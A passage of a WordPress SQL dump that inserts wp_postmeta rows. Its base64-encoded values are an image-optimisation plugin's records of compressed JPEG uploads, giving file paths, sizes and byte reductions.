DM1NTE1NDQsImlkIjoxOTIwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTExMS1FUE9YWS1TVFJJUFBJTkctMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTExLUVQT1hZLVNUUklQUElORy0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtMTExLUVQT1hZLVNUUklQUElORy0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxMTA5MywidGltZSI6MTQ4MzU1MTU0OCwiaWQiOjE5MjB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTExLUVQT1hZLVNUUklQUElORy0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTExMS1FUE9YWS1TVFJJUFBJTkctMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0xMTEtRVBPWFktU1RSSVBQSU5HLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1MjUsInRpbWUiOjE0ODM1NTE1NTEsImlkIjoxOTIwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTExMS1FUE9YWS1TVFJJUFBJTkctMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0xMTEtRVBPWFktU1RSSVBQSU5HLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtMTExLUVQT1hZLVNUUklQUElORy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDQ5LCJ0aW1lIjoxNDgzNTUxNTU0LCJpZCI6MTkyMH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0xMTEtRVBPWFktU1RSSVBQSU5HLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTExLUVQT1hZLVNUUklQUElORy0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTExMS1FUE9YWS1TVFJJUFBJTkctMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjUxNiwidGltZSI6MTQ4MzU1MTU1OCwiaWQiOjE5MjB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTExLUVQT1hZLVNUUklQUElORy01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTExMS1FUE9YWS1TVFJJUFBJTkctNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0xMTEtRVBPWFktU1RSSVBQSU5HLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxNjM5LCJ0aW1lIjoxNDgzNTUxNTYyLCJpZCI6MTkyMH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTExMS1FUE9YWS1TVFJJUFBJTkctMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0xMTEtRVBPWFktU1RSSVBQSU5HLTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtMTExLUVQT1hZLVNUUklQUElORy0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6Njk5LCJ0aW1lIjoxNDgzNTUxNTY1LCJpZCI6MTkyMH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTExMS1FUE9YWS1TVFJJUFBJTkctNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0xMTEtRVBPWFktU1RSSVBQSU5HLTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtMTExLUVQT1hZLVNUUklQUElORy00NTB4MzAwLmpwZyIsInJlZHVjdGlvbiI6ODExLCJ0aW1lIjoxNDgzNTUxNTY4LCJpZCI6MTkyMH1d'); 
INSERT INTO `wp_postmeta` VALUES (28992, 1919, 'wpfc_optimisation_reduction', '991878'); 
INSERT INTO `wp_postmeta` VALUES (28993, 1919, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzE0NjY5MTk3MS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja18xNDY2OTE5NzEuanBnIiwid2lkdGgiOjM4NzIsImhlaWdodCI6MjU5MiwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja18xNDY2OTE5NzEuanBnIiwicmVkdWN0aW9uIjo5OTE4NjgsInRpbWUiOjE0ODM1NTE1NzksImlkIjoiMTkxOSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzE0NjY5MTk3MS0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja18xNDY2OTE5NzEtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9zaHV0dGVyc3RvY2tfMTQ2NjkxOTcxLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUxNTgxLCJpZCI6MTkxOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zaHV0dGVyc3RvY2tfMTQ2NjkxOTcxLTgwMHg1MzYuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1MzYsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzE0NjY5MTk3MS04MDB4NTM2LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja18xNDY2OTE5NzEtODAweDUzNi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTE1ODQsImlkIjoxOTE5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja18xNDY2OTE5NzEtNzY4eDUxNC5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxNCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zaHV0dGVyc3RvY2tfMTQ2NjkxOTcxLTc2OHg1MTQuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzE0NjY5MTk3MS03Njh4NTE0LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MTU4NywiaWQiOjE5MTl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzE0NjY5MTk3MS0xNjAweDEwNzEuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA3MSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zaHV0dGVyc3RvY2tfMTQ2NjkxOTcxLTE2MDB4MTA3MS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9zaHV0dGVyc3RvY2tfMTQ2NjkxOTcxLTE2MDB4MTA3MS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTE1OTEsImlkIjoxOTE5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja18xNDY2OTE5NzEtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zaHV0dGVyc3RvY2tfMTQ2NjkxOTcxLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzE0NjY5MTk3MS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MTU5MywiaWQiOjE5MTl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzE0NjY5MTk3MS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja18xNDY2OTE5NzEtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9zaHV0dGVyc3RvY2tfMTQ2NjkxOTcxLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUxNTk2LCJpZCI6MTkxOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zaHV0dGVyc3RvY2tfMTQ2NjkxOTcxLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzE0NjY5MTk3MS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja18xNDY2OTE5NzEtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTE1OTgsImlkIjoxOTE5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja18xNDY2OTE5NzEtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zaHV0dGVyc3RvY2tfMTQ2NjkxOTcxLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzE0NjY5MTk3MS01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MTYwMSwiaWQiOjE5MTl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zaHV0dGVyc3RvY2tfMTQ2NjkxOTcxLTIyNXgzNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzE0NjY5MTk3MS0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja18xNDY2OTE5NzEtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTE2MDMsImlkIjoxOTE5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzE0NjY5MTk3MS00NTB4MzAxLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja18xNDY2OTE5NzEtNDUweDMwMS5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjMwMSIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9zaHV0dGVyc3RvY2tfMTQ2NjkxOTcxLTQ1MHgzMDEuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUxNjA2LCJpZCI6MTkxOX1d'); 
INSERT INTO `wp_postmeta` VALUES (28994, 1918, 'wpfc_optimisation_reduction', '21969'); 
INSERT INTO `wp_postmeta` VALUES (28995, 1918, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTUwNS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS01MDUuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU1MTYxMCwiaWQiOiIxOTE4In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktNTA1LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTUwNS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0hFTE9YWS01MDUtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjc4OCwidGltZSI6MTQ4MzU1MTYxMywiaWQiOjE5MTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTUwNS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS01MDUtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IRUxPWFktNTA1LTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoyNzE2LCJ0aW1lIjoxNDgzNTUxNjE3LCJpZCI6MTkxOH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktNTA1LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTUwNS03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0hFTE9YWS01MDUtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjI0NTEsInRpbWUiOjE0ODM1NTE2MjEsImlkIjoxOTE4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS01MDUtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTUwNS0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvSEVMT1hZLTUwNS0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxMTQxNywidGltZSI6MTQ4MzU1MTYyNSwiaWQiOjE5MTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTUwNS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS01MDUtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IRUxPWFktNTA1LTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1NzQsInRpbWUiOjE0ODM1NTE2MjgsImlkIjoxOTE4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS01MDUtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktNTA1LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvSEVMT1hZLTUwNS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDQ5LCJ0aW1lIjoxNDgzNTUxNjMyLCJpZCI6MTkxOH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktNTA1LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTUwNS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0hFTE9YWS01MDUtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjQ5MywidGltZSI6MTQ4MzU1MTYzNSwiaWQiOjE5MTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTUwNS01MTB4NjAwLmpwZyIsIndpZHRoIjo1M